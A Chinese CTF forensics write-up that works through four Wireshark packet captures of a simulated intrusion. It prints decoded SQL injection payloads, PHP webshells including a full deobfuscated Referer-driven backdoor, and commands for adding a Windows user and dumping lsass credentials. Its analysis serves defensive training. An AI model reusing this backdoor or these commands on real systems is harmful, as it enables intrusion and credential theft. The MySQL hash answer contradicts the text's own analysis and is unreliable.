目錄

前言?

一、題目一(1.pcap)

二、題目二(2.pcap)

三、題目三(3.pcap)

四、題目四(4.pcap)

前言?

Wireshark流量包分析對(duì)于安全來說是很重要的，我們可以通過Wireshark來診斷網(wǎng)絡(luò)問題，檢測網(wǎng)絡(luò)攻擊、監(jiān)控網(wǎng)絡(luò)流量以及捕獲惡意軟件等等

接下來我們來看一道數(shù)據(jù)分析題，需要4個(gè)流量包 1-4.pcap，網(wǎng)盤鏈接自行提取

鏈接：https://pan.baidu.com/s/1gTL_l0Xk2xP3ZNWYvBWi8g?pwd=d6g7?
提取碼：d6g7

一、題目一(1.pcap)

題目要求：

1.黑客攻擊的第一個(gè)受害主機(jī)的網(wǎng)卡IP地址

2.黑客對(duì)URL的哪一個(gè)參數(shù)實(shí)施了SQL注入

3.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的表前綴（加上下劃線例如abc）

4.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的名字

看到題目SQL注入，那就首先過濾http和https協(xié)議

過濾后可以看到兩個(gè)出現(xiàn)次數(shù)比較多的ip，202.1.1.2和192.168.1.8，可以看到202.1.1.2對(duì)192.168.1.8進(jìn)行了攻擊

這里第一個(gè)問題的答案就出來了，受害主機(jī)網(wǎng)卡IP是192.168.1.8 ，202.1.1.2為攻擊者IP

然后直接看源IP為202.1.1.2的http請求包

這里隨便先看一個(gè)包，urlcode解碼后如下

可以看到黑客使用了SQL注入，試圖構(gòu)造存儲(chǔ)型xss

option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(&XfqR=2916 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',tab

再看一個(gè)包，同樣urlcode解碼

分析后發(fā)現(xiàn)仍在嘗試SQL注入，注入工具sqlmap，注入點(diǎn)為list[select]

option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(883

然后我們?nèi)プ粉櫼粋€(gè)SQL注入的TCP流

可以看到數(shù)據(jù)庫為MariaDB，已經(jīng)報(bào)錯(cuò)，而且表前綴為ajtuc_

要找到數(shù)據(jù)庫名的話，我們最好去最后那幾條去找，看到url中如果包含schema關(guān)鍵字，那大概率就是數(shù)據(jù)庫名

這里的數(shù)據(jù)庫名使用十六進(jìn)制解碼，解碼出來就是joomla

答案：

1.黑客攻擊的第一個(gè)受害主機(jī)的網(wǎng)卡IP地址?
192.168.1.8
2.黑客對(duì)URL的哪一個(gè)參數(shù)實(shí)施了SQL注入
list[select]
3.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的表前綴(加上下劃線例如abc_)
ajtuc_
4.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的名字
joomla

二、題目二(2.pcap)

打開2.pcap

題目要求：

1.黑客第一次獲得的php木馬的密碼是什么

2.黑客第二次上傳php木馬是什么時(shí)間

3.第二次上傳的木馬通過HTTP協(xié)議中的哪個(gè)頭傳遞數(shù)據(jù)

題目要求php木馬的密碼，首先我們要知道php一句話木馬一般都是POST請求

所以我們直接過濾POST請求，發(fā)現(xiàn)這個(gè)IP請求了一個(gè)名為kkkaaa.php的php文件，很可疑

正常文件不會(huì)以此命名的， 打開數(shù)據(jù)包看一下，發(fā)現(xiàn)了這個(gè)字段

Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"

其實(shí)一句話木馬密碼已經(jīng)出來了，就是zzz

這里他上傳的一句話木馬應(yīng)該是

<?php eval($_POST['zzz']);?>

然后又將eval(base64_decode($_POST[z0]));傳入zzz參數(shù)，目的是將z0傳入的數(shù)據(jù)進(jìn)行base64的解碼

此時(shí)z0傳入base64編碼后的數(shù)據(jù)，便可以執(zhí)行惡意代碼

解碼后發(fā)現(xiàn)執(zhí)行了dirname函數(shù)，目的是查看當(dāng)前路徑下的文件或目錄，類似linux下的ls命令

第二題是第二次上傳木馬的時(shí)間

沒有頭緒的話來分析下過濾出來的這幾個(gè)包，其他參數(shù)都一樣，重要的是Length這個(gè)字段

第一個(gè)包毋庸置疑是會(huì)比其他包長一點(diǎn)，但是第四個(gè)包很奇怪，和其他包相比長了150多字節(jié)左右

追蹤tcp流

可以明顯看到z2很不正常，其他參數(shù)都是urlcode和base64編碼

z2使用十六進(jìn)制編碼，我們來解碼看一下

這樣的PHP代碼是通過混淆過的，讓我們根本看不懂他的代碼

經(jīng)過還原后的代碼：?

<?php
$kh = "cb42";
$kf = "e130";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}

$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s =& $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i = $m[1][0] . $m[1][4];
        $h = $sl($ss(md5($i . $kh), 0, 3));
        $f = $sl($ss(md5($i . $kf), 0, 3));
        $p = "";
        for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {
            $s[$i] = "";
            $p = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i] .= $p;
            $e = strpos($s[$i], $f);
            if ($e) {
                $k = $kh . $kf;
                ob_start();
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));
                $o = ob_get_contents();
                ob_end_clean();
                $d = base64_encode(x(gzcompress($o), $k));
                print("<$k>$d</$k>");
                @session_destroy();
            }
        }
    }
}
?>

檢查后發(fā)現(xiàn)create_function函數(shù)，這個(gè)函數(shù)是可以執(zhí)行命令的

官方也提示這個(gè)函數(shù)在8.0已經(jīng)被移除，并且和eval()函數(shù)有同樣的安全隱患

說明黑客是利用了create_function函數(shù)來上傳了自己的木馬

時(shí)間的話，ctrl+f，選擇分組詳情，選擇字符串，搜索time字符串，時(shí)間就出來了

Feb ?7, 2018 17:20:44.248365000 中國標(biāo)準(zhǔn)時(shí)間

然后我們來分析一下這個(gè)木馬

木馬要利用，就必然會(huì)與數(shù)據(jù)包進(jìn)行交互，仔細(xì)看看這兩行代碼

$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];

這兩行代碼是獲取http請求中的referer和accept_language字段的，與數(shù)據(jù)包產(chǎn)生了交互

所以可以基本斷定這兩個(gè)字段是黑客用來傳輸他想執(zhí)行的命令的

我們隨便看一個(gè)訪問footer.php的包

發(fā)現(xiàn)Referer字段長度很不正常，Accept-Language字段正常

所以可以基本確定，木馬通過HTTP協(xié)議中的referer頭傳遞數(shù)據(jù)

答案?

1.黑客第一次獲得的php木馬的密碼是什么
zzz
2.黑客第二次上傳php木馬是什么時(shí)間
17:20:44.248365
3.第二次上傳的木馬通過HTTP協(xié)議中的哪個(gè)頭傳遞數(shù)據(jù)
Referer

三、題目三(3.pcap)

打開3.pcap

題目要求：

1.內(nèi)網(wǎng)主機(jī)的mysql用戶名和請求連接的密碼hash是多少(用戶:密碼hash)

2.php代理第一次被使用時(shí)最先連接了哪個(gè)IP地址

題目要求mysql的數(shù)據(jù)，直接過濾，tcp contains "mysql" && mysql

發(fā)現(xiàn)黑客一直在爆破MySQL密碼

我們找到最后一條，可能是爆破成功的密碼

用戶：admin

密碼Hash：4858e7dcb0968daa7b599be4b0edb88a25ad89ac

然后過濾http請求，發(fā)現(xiàn)名為tunnel.php的php文件

點(diǎn)開可以清晰地看到php代理第一次連接的IP地址是4.2.2.2，端口53?

答案

1.內(nèi)網(wǎng)主機(jī)的mysql用戶名和請求連接的密碼hash是多少(用戶:密碼hash)
? ?admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4
2.php代理第一次被使用時(shí)最先連接了哪個(gè)IP地址
? ?4.2.2.2

四、題目四(4.pcap)

打開4.pcap

題目要求：

1.黑客第一次獲取到當(dāng)前目錄下的文件列表的漏洞利用請求發(fā)生在什么時(shí)候

2.黑客在內(nèi)網(wǎng)主機(jī)中添加的用戶名和密碼是多少

3.黑客從內(nèi)網(wǎng)服務(wù)器中下載下來的文件名

獲取當(dāng)前目錄的文件列表的命令，Windows中是dir，linux中是ls

直接過濾

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "dir" || http contains "ls")

發(fā)現(xiàn)有l(wèi)s，也有dir

追蹤tcp流，發(fā)現(xiàn)第一次的ls沒有執(zhí)行成功，因?yàn)闆]有服務(wù)器回顯

第二次的dir執(zhí)行成功了

?搜索時(shí)間

Feb ?7, 2018 18:36:59.770782000 中國標(biāo)準(zhǔn)時(shí)間

在Windows下添加用戶必然要使用net user，管理員用戶回顯Administrator，所以我們直接過濾

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "user" || http contains "Administrator")

這里看到是沒有任何用戶的，時(shí)間Feb ?7, 2018 18:49:27.767754000 中國標(biāo)準(zhǔn)時(shí)間

再往后面看發(fā)現(xiàn)已經(jīng)添加了管理員用戶kaka，時(shí)間

Feb ?7, 2018 18:50:42.908737000 中國標(biāo)準(zhǔn)時(shí)間?

那么黑客必然是在這個(gè)時(shí)間段執(zhí)行了添加用戶的命令

然后我們就來看這期間的http請求，直接通過時(shí)間過濾

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http && frame.time_relative >= 827.109385 && frame.time_relative <= 902.267039

最終我們發(fā)現(xiàn)這個(gè)不尋常的請求

通過base64解碼發(fā)現(xiàn)

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user kaka kaka /add&echo [S]&cd&echo [E]

用戶名和密碼分別為? ?kaka:kaka

最后一題是下載，一句話木馬是POST請求，而且攻擊的IP地址為192.168.2.20，那就直接過濾

ip.dst == 192.168.2.20 && http.request.method == POST

篩出來之后沒辦法只有一個(gè)個(gè)看，base64解碼?

然后在最后發(fā)現(xiàn)了這個(gè)包

解碼后：?

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&procdump.exe -accepteula -ma lspasss.dmp&echo [S]&cd&echo [E]?

發(fā)現(xiàn)使用了procdump.exe

往后看發(fā)現(xiàn)了這個(gè)包

解碼出來是這樣的?

C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp

最后我們可以確定，黑客下載了lsass.exe_180208_185247.dmp文件

答案

1.黑客第一次獲取到當(dāng)前目錄下的文件列表的漏洞利用請求發(fā)生在什么時(shí)候
Feb ?7, 2018 18:36:59.770782000
2.黑客在內(nèi)網(wǎng)主機(jī)中添加的用戶名和密碼是多少
kaka:kaka
3.黑客從內(nèi)網(wǎng)服務(wù)器中下載下來的文件名
lsass.exe_180208_185247.dmp文章來源地址http://www.zghlxwxcb.cn/news/detail-671543.html

到了這里，關(guān)于Wireshark流量分析例題的文章就介紹完了。如果您還想了解更多內(nèi)容，請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！